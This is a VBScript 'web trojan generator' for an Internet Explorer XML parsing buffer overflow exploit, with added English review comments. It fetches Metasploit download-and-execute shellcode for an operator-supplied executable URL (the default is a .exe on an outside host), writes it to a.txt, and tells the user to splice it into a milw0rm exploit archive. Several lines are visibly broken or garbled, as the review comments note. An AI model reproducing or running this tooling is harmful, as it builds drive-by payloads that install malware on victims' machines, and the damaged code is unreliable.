网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

  'code by lcx

  ' Script-wide error suppression: from here on, any runtime failure (network, regex, file
  ' access) is ignored and execution simply continues with whatever values are left.
  On Error Resume Next

  ' Asks the operator for the address of an executable; the third argument is the default value.
  Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )

  ' Builds a request URL for a payload-generation web interface on TCP port 55555, selecting
  ' the win32_downloadexec module and passing the operator-supplied address as OPT_URL.
  ' The value is passed through URLEncoding(), which copies ASCII characters unchanged.
  url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

  ' Synchronous HTTP GET; getHTTPPage decodes the response bytes as GB2312 text.
  ' The transport is plain http, so the response is neither authenticated nor integrity-checked.
  Body = getHTTPPage(url)

  Set Re = New RegExp

  ' NOTE(review): in this copy the pattern literal is broken across several lines, so the
  ' statement is not valid VBScript as shown. It looks like the extraction dropped markup
  ' or escape characters; confirm against an authoritative copy before analysing it.
  Re.Pattern = "($shellcode =[sS]+

)"

  Set Matches = Re.Execute(Body)

  ' When the pattern matches, Body is narrowed to the first match only.
  If Matches.Count>0 Then Body = Matches(0).value

  ' Strips the "$shellcode =" prefix, double quotes (Chr(34)), CR, ";", LF and "." from Body
  ' and trims the result into `code`.
  ' NOTE(review): one of the Replace() search strings is also split across lines in this copy.
  code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"

",""),Chr(10),""),".",""))

  ' Runs one global, case-insensitive regular-expression replacement over str and
  ' returns the rewritten string.
  ' NOTE(review): the pattern and the replacement literal both look damaged in this copy
  ' (the replacement is a single non-ASCII character, which suggests a character-encoding
  ' conversion). Treat the exact transformation as unknown until checked against an
  ' authoritative copy.
  function replaceregex(str)

  set regex=new regExp

  regex.pattern="\x(..)\x(..)"

  regex.IgnoreCase=true

  ' Replace every occurrence, not only the first.
  regex.global=true

  ' `matches` holds the replaced string here, not a match collection.
  matches=regex.replace(str,"탑")

  replaceregex=matches

  end Function

  ' Fetches Path with GetBody and returns the response decoded as GB2312 text.
  ' The charset is fixed; the server's declared encoding is not consulted.
  Function getHTTPPage(Path)
    getHTTPPage = BytesToBstr(GetBody(Path), "GB2312")
  End Function

  ' Performs a synchronous HTTP GET on url and returns the raw response body (byte array).
  ' Errors are suppressed inside the function, so a failed request leaves the return value
  ' unset rather than raising. There is no status-code check, no timeout handling and no
  ' validation of the returned content.
  Function GetBody(url)
    On Error Resume Next

    Dim http
    Set http = CreateObject("Microsoft.XMLHTTP")

    ' Third argument False = blocking call; empty user name and password.
    http.Open "Get", url, False, "", ""
    http.Send
    GetBody = http.ResponseBody

    Set http = Nothing
  End Function

  ' Converts a byte array (Body) to a string using the character set named in Cset.
  ' The bytes are written to an ADODB.Stream in binary mode, the stream is rewound and
  ' switched to text mode, and the content is read back under the requested charset.
  Function BytesToBstr(Body, Cset)
    Const adTypeBinary = 1
    Const adTypeText = 2
    Const adModeReadWrite = 3

    Dim stm
    Set stm = CreateObject("adodb.stream")

    With stm
      .Type = adTypeBinary
      .Mode = adModeReadWrite
      .Open
      .Write Body

      ' Rewind before changing the stream type; the type is switched at position 0.
      .Position = 0
      .Type = adTypeText
      .Charset = Cset

      BytesToBstr = .ReadText
      .Close
    End With

    Set stm = Nothing
  End Function

  ' Walks vstrIn one character at a time and builds the return string.
  ' Characters whose absolute Asc() value is below &HFF are copied unchanged; any other
  ' character is split into a high and a low byte and emitted as "%HH%LL".
  ' Despite the name, reserved ASCII characters (for example "&", "=", "?", space) are NOT
  ' percent-encoded, so the caller's value is concatenated into the query string as typed.
  Function URLEncoding(vstrIn)

  strReturn = ""

  For aaaa = 1 To Len(vstrIn)

  ThisChr = Mid(vStrIn,aaaa,1)

  If Abs(Asc(ThisChr)) < &HFF Then

  strReturn = strReturn & ThisChr

  Else

  innerCode = Asc(ThisChr)

  ' Asc() can return a negative value for double-byte characters; normalise to 0..65535.
  If innerCode < 0 Then

  innerCode = innerCode + &H10000

  End If

  ' NOTE(review): there is no operator between ")" and "&HFF" in this copy, so the line is
  ' not valid VBScript as shown. A character was probably lost in extraction; confirm.
  Hight8 = (innerCode And &HFF00) &HFF

  Low8 = innerCode And &HFF

  ' Hex() does not zero-pad, so a byte value below &H10 yields a single hex digit here.
  strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

  End If

  Next

  URLEncoding = strReturn

  End Function

  ' Output stage: converts `code` once, writes it to a.txt in the current working directory
  ' (created if missing, overwritten if present) and echoes the same text to the console.
  ' Artefacts visible from this script for triage: a file named a.txt written by the script
  ' host, and an outbound HTTP request to port 55555 made earlier through Microsoft.XMLHTTP.
  Const ForWriting = 2

  Dim convertedText, fileSystem, outFile
  convertedText = replaceregex(code)

  Set fileSystem = CreateObject("scripting.filesystemobject")
  Set outFile = fileSystem.opentextfile("a.txt", ForWriting, True)

  outFile.writeline convertedText
  wscript.echo convertedText
  outFile.close

  Set fileSystem = Nothing

  ' Completion message shown to the operator (Chinese); it names the generated a.txt.
  wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"